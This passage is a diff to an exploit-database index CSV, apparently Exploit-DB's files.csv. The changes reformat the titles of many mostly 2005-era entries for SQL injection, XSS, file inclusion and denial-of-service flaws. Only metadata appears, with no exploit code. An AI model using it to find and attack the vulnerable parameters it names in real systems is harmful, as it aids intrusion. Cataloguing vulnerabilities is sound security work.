Injection",2005-11-23,r0t3d3Vil,php,webapps,0 @@ -23703,11 +23703,11 @@ id,file,description,date,author,platform,type,port 26576,platforms/php/webapps/26576.txt,"FreeForum 1.0/1.1 - Multiple SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0 26578,platforms/windows/dos/26578.py,"Realtek Sound Manager AvRack (.wav) - Crash PoC",2013-07-03,Asesino04,windows,dos,0 -26579,platforms/windows/local/26579.rb,"ABBS Audio Media Player .LST Buffer Overflow",2013-07-03,Metasploit,windows,local,0 +26579,platforms/windows/local/26579.rb,"ABBS Audio Media Player - .LST Buffer Overflow",2013-07-03,Metasploit,windows,local,0 26580,platforms/php/webapps/26580.txt,"SoftBiz Web Hosting Directory Script 1.1 - search_result.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26581,platforms/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 review.php sbres_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 -26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 -26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 +26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 +26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26584,platforms/php/webapps/26584.txt,"vtiger CRM 4.2 Leads Module record Parameter XSS",2005-11-24,"Christopher Kunz",php,webapps,0 26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 RSS Aggregation Module Feed XSS",2005-11-24,"Christopher Kunz",php,webapps,0 26586,platforms/php/webapps/26586.txt,"vtiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0 @@ -23720,21 +23720,21 @@ id,file,description,date,author,platform,type,port 26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 viewstory.php sid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 viewuser.php uid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 26595,platforms/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injection",2005-11-25,r0t3d3Vil,php,webapps,0 -26596,platforms/php/webapps/26596.txt,"AgileBill 1.4.92 Product_Cat SQL Injection",2005-11-25,r0t,php,webapps,0 +26596,platforms/php/webapps/26596.txt,"AgileBill 1.4.92 - Product_Cat SQL Injection",2005-11-25,r0t,php,webapps,0 26597,platforms/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps,0 26598,platforms/php/webapps/26598.txt,"Athena PHP Website Administration 0.1 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 26599,platforms/php/webapps/26599.txt,"PHPGreetz 0.99 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 26600,platforms/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 26601,platforms/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",linux,dos,0 -26602,platforms/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 send.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26603,platforms/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 messages.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26602,platforms/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 - send.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26603,platforms/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 - messages.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26604,platforms/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 26605,platforms/php/webapps/26605.txt,"Babe Logger 2.0 - index.php gal Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26606,platforms/php/webapps/26606.txt,"Babe Logger 2.0 - comments.php id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26607,platforms/php/webapps/26607.txt,"Top Music Module 3.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 26608,platforms/php/webapps/26608.txt,"PHPWordPress 3.0 - Multiple SQL Injection",2005-11-28,r0t,php,webapps,0 26609,platforms/php/webapps/26609.txt,"Bedeng PSP 1.1 baca.php ckode Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26610,platforms/php/webapps/26610.txt,"Bedeng PSP 1.1 download.php a.ngroup Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26610,platforms/php/webapps/26610.txt,"Bedeng PSP 1.1 - download.php a.ngroup Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26611,platforms/php/webapps/26611.txt,"Bedeng PSP 1.1 - index.php a.nsub Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26612,platforms/php/webapps/26612.txt,"Nelogic Nephp Publisher 4.5.2 - SQL Injection",2005-11-28,r0t,php,webapps,0 26613,platforms/php/webapps/26613.txt,"Softbiz Resource Repository Script - details_res.php sbres_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 @@ -23749,13 +23749,13 @@ id,file,description,date,author,platform,type,port 26623,platforms/php/webapps/26623.txt,"Kasseler CMS 2 r1223 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",php,webapps,0 26624,platforms/php/webapps/26624.txt,"OpenX 2.8.10 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",php,webapps,0 26625,platforms/php/webapps/26625.txt,"EdmoBBS 0.9 - SQL Injection",2005-11-28,r0t,php,webapps,0 -26626,platforms/php/webapps/26626.txt,"UGroup 2.6.2 forum.php FORUM_ID Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26627,platforms/php/webapps/26627.txt,"UGroup 2.6.2 topic.php Multiple Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26626,platforms/php/webapps/26626.txt,"UGroup 2.6.2 - forum.php FORUM_ID Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26627,platforms/php/webapps/26627.txt,"UGroup 2.6.2 - topic.php Multiple Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26628,platforms/php/webapps/26628.txt,"ShockBoard 3.0/4.0 Offset Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26629,platforms/php/webapps/26629.txt,"Netzbrett 1.5.1 P_Entry Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26630,platforms/php/webapps/26630.txt,"ADC2000 NG Pro 1.2 - SQL Injection",2005-11-28,r0t,php,webapps,0 26631,platforms/php/webapps/26631.txt,"Simple Document Management System 2.0 list.php folder_id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26632,platforms/php/webapps/26632.txt,"Simple Document Management System 2.0 messages.php mid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26632,platforms/php/webapps/26632.txt,"Simple Document Management System 2.0 - messages.php mid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26633,platforms/php/webapps/26633.txt,"PDJK-support Suite 1.1 - Multiple SQL Injection",2005-11-28,r0t,php,webapps,0 26634,platforms/php/webapps/26634.txt,"Randshop Multiple SQL Injection",2005-11-28,liz0,php,webapps,0 26635,platforms/php/webapps/26635.txt,"FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-11-28,"Francesco Ongaro",php,webapps,0 @@ -23768,9 +23768,9 @@ id,file,description,date,author,platform,type,port 26642,platforms/php/webapps/26642.txt,"GuppY 4.5 nwlmail.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 26643,platforms/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Inclusion",2005-11-28,r0t,php,webapps,0 26644,platforms/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 - Multiple Products Cross-Site Scripting Vulnerabilities",2005-11-28,r0t,php,webapps,0 -26645,platforms/php/webapps/26645.txt,"ASP-Rider 1.6 Default.ASP SQL Injection",2005-11-29,info@hoder.com,php,webapps,0 +26645,platforms/php/webapps/26645.txt,"ASP-Rider 1.6 - Default.ASP SQL Injection",2005-11-29,info@hoder.com,php,webapps,0 26646,platforms/php/webapps/26646.txt,"PHP Upload Center Index.php Directory Traversal",2005-11-29,liz0,php,webapps,0 -26647,platforms/php/webapps/26647.txt,"Fantastic Scripts Fantastic News 2.1.1 News.php SQL Injection",2005-11-29,r0t3d3Vil,php,webapps,0 +26647,platforms/php/webapps/26647.txt,"Fantastic Scripts Fantastic News 2.1.1 - News.php SQL Injection",2005-11-29,r0t3d3Vil,php,webapps,0 26648,platforms/linux/dos/26648.c,"Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service",2005-11-29,"Avi Kivity",linux,dos,0 26649,platforms/php/webapps/26649.txt,"DMANews 0.9 - Multiple SQL Injection",2005-11-29,r0t,php,webapps,0 26650,platforms/php/webapps/26650.txt,"Entergal MX 2.0 - Multiple SQL Injection",2005-11-29,r0t,php,webapps,0 @@ -23789,7 +23789,7 @@ id,file,description,date,author,platform,type,port 26663,platforms/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injection",2005-11-29,r0t,php,webapps,0 26664,platforms/hardware/webapps/26664.txt,"Multiple D-Link Devices - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,hardware,webapps,0 26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service",2006-01-17,"David Maciejak",windows,dos,0 -26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 Malformed Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0 +26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0 26667,platforms/php/webapps/26667.txt,"SocketKB 1.1 - Index.php SQL Injection",2005-11-30,r0t,php,webapps,0 26668,platforms/php/webapps/26668.txt,"PHPAlbum 0.2.3/4.1 - Local File Inclusion",2005-11-30,r0t3d3Vil,php,webapps,0 26669,platforms/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 selloffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 @@ -23797,19 +23797,19 @@ id,file,description,date,author,platform,type,port 26671,platforms/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 products.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26672,platforms/php/webapps/26672.txt,"SoftBiz B2B trading Marketplace Script 1.1 profiles.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26673,platforms/php/webapps/26673.txt,"SoftBiz FAQ 1.1 - index.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26674,platforms/php/webapps/26674.txt,"SoftBiz FAQ 1.1 faq_qanda.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26674,platforms/php/webapps/26674.txt,"SoftBiz FAQ 1.1 - faq_qanda.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26675,platforms/php/webapps/26675.txt,"SoftBiz FAQ 1.1 refer_friend.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26676,platforms/php/webapps/26676.txt,"SoftBiz FAQ 1.1 print_article.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26677,platforms/php/webapps/26677.txt,"SoftBiz FAQ 1.1 add_comment.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26676,platforms/php/webapps/26676.txt,"SoftBiz FAQ 1.1 - print_article.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26677,platforms/php/webapps/26677.txt,"SoftBiz FAQ 1.1 - add_comment.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26678,platforms/php/webapps/26678.txt,"FAQRing 3.0 Answer.php SQL Injection",2005-11-30,r0t,php,webapps,0 26679,platforms/php/webapps/26679.txt,"WSN Knowledge Base 1.2 - index.php Multiple Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26680,platforms/php/webapps/26680.txt,"WSN Knowledge Base 1.2 comments.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26680,platforms/php/webapps/26680.txt,"WSN Knowledge Base 1.2 - comments.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26681,platforms/php/webapps/26681.txt,"WSN Knowledge Base 1.2 memberlist.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26682,platforms/php/webapps/26682.txt,"OpenNetAdmin 13.03.01 - Remote Code Execution",2013-07-07,Mandat0ry,php,webapps,0 26683,platforms/php/webapps/26683.txt,"O-Kiraku Nikki 1.3 Nikki.php SQL Injection",2005-11-30,r0t,php,webapps,0 26684,platforms/php/webapps/26684.txt,"88Scripts Event Calendar 2.0 - Index.php SQL Injection",2005-11-30,r0t,php,webapps,0 26685,platforms/php/webapps/26685.txt,"Instant Photo Gallery 1.0 portfolio.php cat_id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26686,platforms/php/webapps/26686.txt,"Instant Photo Gallery 1.0 content.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26686,platforms/php/webapps/26686.txt,"Instant Photo Gallery 1.0 - content.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26687,platforms/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injection",2005-12-01,lwang,php,webapps,0 26688,platforms/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,php,webapps,0 26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 Session.php SQL Injection",2005-12-01,Siegfried,php,webapps,0 @@ -23821,7 +23821,7 @@ id,file,description,date,author,platform,type,port 26695,platforms/php/webapps/26695.txt,"phpMyChat 0.14.6 style.css.php medium Parameter XSS",2005-12-01,"Louis Wang",php,webapps,0 26696,platforms/php/webapps/26696.txt,"phpMyChat 0.14.6 users_popupL.php From Parameter XSS",2005-12-01,"Louis Wang",php,webapps,0 26697,platforms/php/webapps/26697.php,"PHPX 3.5.x - Admin Login.php SQL Injection",2005-11-30,rgod,php,webapps,0 -26698,platforms/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 gallery.php CatID Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 +26698,platforms/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - gallery.php CatID Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 26699,platforms/php/webapps/26699.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 ViewItem.php ItemNum Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 26700,platforms/jsp/webapps/26700.txt,"Java Search Engine 0.9.34 - Search.JSP Cross-Site Scripting",2005-12-02,r0t,jsp,webapps,0 26701,platforms/asp/webapps/26701.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d adv_search.asp srch_product_name Parameter XSS",2005-12-03,r0t3d3Vil,asp,webapps,0 @@ -23835,7 +23835,7 @@ id,file,description,date,author,platform,type,port 26709,platforms/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 - Local Root on x86",2013-07-09,"Larry W. Cashdollar",lin_x86,local,0 26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0 26713,platforms/php/webapps/26713.txt,"phpYellowTM 5.33 - search_result.php haystack Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 -26714,platforms/php/webapps/26714.txt,"phpYellowTM 5.33 print_me.php ckey Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 +26714,platforms/php/webapps/26714.txt,"phpYellowTM 5.33 - print_me.php ckey Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 26715,platforms/php/webapps/26715.txt,"Widget Property 1.1.19 Property.php SQL Injection",2005-11-05,r0t3d3Vil,php,webapps,0 26716,platforms/cgi/webapps/26716.txt,"Easy Search System 1.1 - Search.cgi Cross-Site Scripting",2005-12-05,r0t,cgi,webapps,0 26717,platforms/php/webapps/26717.txt,"Web4Future eCommerce Enterprise Edition 2.1 view.php Multiple Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 @@ -23866,14 +23866,14 @@ id,file,description,date,author,platform,type,port 26743,platforms/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 KB.ASP Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 26744,platforms/asp/webapps/26744.txt,"NetauctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-06,r0t,asp,webapps,0 26745,platforms/asp/webapps/26745.txt,"RWAuction Pro 4.0 - Search.ASP Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 -26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 faqDspItem.asp faqid Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 -26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 faqDsp.asp catcode Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 +26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 - faqDspItem.asp faqid Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 +26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 - faqDsp.asp catcode Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x - Connector.php Directory Traversal",2005-12-06,rgod,php,webapps,0 26749,platforms/linux/dos/26749.c,"Linux Kernel 2.6.x - File Lock Lease Local Denial of Service",2005-12-29,"J. Bruce Fields",linux,dos,0 26750,platforms/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - Index.php Multiple SQL Injection",2005-12-06,r0t,php,webapps,0 26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - Index.php Multiple SQL Injection",2005-12-06,r0t,php,webapps,0 -26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0 -26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0 +26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0 +26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0 26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0/4.1 Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0 26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 @@ -23889,14 +23889,14 @@ id,file,description,date,author,platform,type,port 26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 - Index.CFM Local File Inclusion",2005-12-08,r0t,cfm,webapps,0 26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 - Index.CFM Cross-Site Scripting",2005-12-08,r0t,cfm,webapps,0 26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 Cal_make.PL Cross-Site Scripting",2005-12-08,$um$id,cgi,remote,0 -26769,platforms/windows/dos/26769.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 Malformed Range Memory Corruption",2005-12-08,fearwall,windows,dos,0 -26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 Register.php Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 +26769,platforms/windows/dos/26769.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption",2005-12-08,fearwall,windows,dos,0 +26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - Register.php Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 26771,platforms/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",cgi,webapps,0 26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 Book.CFM Cross-Site Scripting",2005-12-12,r0t,cfm,webapps,0 26773,platforms/windows/remote/26773.txt,"LogiSphere 0.9.9 j viewsource.jsp source Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26774,platforms/windows/remote/26774.txt,"LogiSphere 0.9.9 j Search URL NS-query-pat Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26775,platforms/windows/remote/26775.txt,"LogiSphere 0.9.9 j URI Multiple Method Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 -26776,platforms/windows/dos/26776.txt,"Sights - 'N Sounds Streaming Media Server 2.0.3 SWS.EXE Buffer Overflow",2005-12-12,dr_insane,windows,dos,0 +26776,platforms/windows/dos/26776.txt,"Sights 'N Sounds Streaming Media Server 2.0.3 - SWS.EXE Buffer Overflow",2005-12-12,dr_insane,windows,dos,0 26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - SearchDB.ASP Input Validation",2005-12-12,r0t3d3Vil,asp,webapps,0 26778,platforms/jsp/webapps/26778.txt,"Blackboard Academic Suite 6.2.3.23 Frameset.JSP Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps,0 26779,platforms/windows/dos/26779.txt,"Alt-N MDaemon WorldClient 8.1.3 - Denial of Service",2005-12-12,dr_insane,windows,dos,0 @@ -23910,7 +23910,7 @@ id,file,description,date,author,platform,type,port 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0 26788,platforms/php/webapps/26788.txt,"phpCOIN 1.2.2 - includes/db.php $_CCFG[_PKG_PATH_DBSE] Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 Gallery.php SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 -26790,platforms/php/webapps/26790.txt,"PhpWebGallery 1.3.4/1.5.1 comments.php Multiple Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 +26790,platforms/php/webapps/26790.txt,"PhpWebGallery 1.3.4/1.5.1 - comments.php Multiple Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26791,platforms/php/webapps/26791.txt,"PhpWebGallery 1.3.4/1.5.1 category.php search Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26792,platforms/php/webapps/26792.txt,"PhpWebGallery 1.3.4/1.5.1 picture.php image_id Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26793,platforms/php/webapps/26793.txt,"Plogger Beta 2 - index.php id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 @@ -23941,15 +23941,15 @@ id,file,description,date,author,platform,type,port 26818,platforms/php/webapps/26818.txt,"News Module for Envolution modules.php Multiple Parameter XSS",2005-12-14,X1ngBox,php,webapps,0 26819,platforms/php/webapps/26819.txt,"News Module for Envolution modules.php Multiple Parameter SQL Injection",2005-12-14,X1ngBox,php,webapps,0 26820,platforms/asp/webapps/26820.txt,"ASP-DEV XM Forum Forum.ASP Cross-Site Scripting",2005-12-14,Dj_Eyes,asp,webapps,0 -26821,platforms/asp/webapps/26821.txt,"ASPBB 0.4 topic.asp TID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 -26822,platforms/asp/webapps/26822.txt,"ASPBB 0.4 forum.asp FORUM_ID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 +26821,platforms/asp/webapps/26821.txt,"ASPBB 0.4 - topic.asp TID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 +26822,platforms/asp/webapps/26822.txt,"ASPBB 0.4 - forum.asp FORUM_ID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26823,platforms/asp/webapps/26823.txt,"ASPBB 0.4 profile.asp PROFILE_ID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26824,platforms/php/webapps/26824.txt,"WikkaWiki 1.1.6 TextSearch.php Cross-Site Scripting",2005-12-14,r0t,php,webapps,0 -26825,platforms/hardware/dos/26825.txt,"Multiple Linksys Routers LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 +26825,platforms/hardware/dos/26825.txt,"Multiple Linksys Routers - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26826,platforms/php/webapps/26826.txt,"Netref 3.0 - Index.php SQL Injection",2005-12-14,syst3m_f4ult,php,webapps,0 26831,platforms/php/webapps/26831.txt,"QuickPayPro 3.1 - tracking.details.php trackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26832,platforms/php/webapps/26832.txt,"QuickPayPro 3.1 sales.view.php customerid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 -26833,platforms/hardware/dos/26833.txt,"Multiple Unspecified Cisco Catalyst Switches LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 +26833,platforms/hardware/dos/26833.txt,"Multiple Unspecified Cisco Catalyst Switches - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26834,platforms/hardware/dos/26834.txt,"Westell Versalink 327W LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26836,platforms/php/webapps/26836.txt,"Limbo CMS 1.0.4.2 - index.php _SERVER[REMOTE_ADDR] Parameter XSS",2005-12-14,rgod,php,webapps,0 @@ -23977,21 +23977,21 @@ id,file,description,date,author,platform,type,port 26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - reply.pl Multiple Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - stats.pl Multiple Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 toc.pl board Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 forum.cgi forum Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 - forum.cgi forum Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 profile.cgi user Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 post.cgi forum Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26863,platforms/cgi/webapps/26863.txt,"ScareCrow 2.13 - post.cgi forum Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26864,platforms/cgi/webapps/26864.txt,"WebGlimpse 2.x - Cross-Site Scripting",2005-12-16,r0t3d3Vil,cgi,webapps,0 26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 webcal.cgi Multiple Parameter XSS",2005-12-16,"Stan Bubrouski",cgi,webapps,0 26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Path Disclosure Weakness",2005-12-17,king_purba,php,webapps,0 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - Index.php Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0 26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum Forum.php SQL Injection",2005-12-19,Zbigniew,php,webapps,0 -26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0 +26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0 26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 26871,platforms/php/webapps/26871.txt,"PlaySms Index.php Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 Members.php Cross-Site Scripting",2005-12-19,krasza,php,webapps,0 -26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 -26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 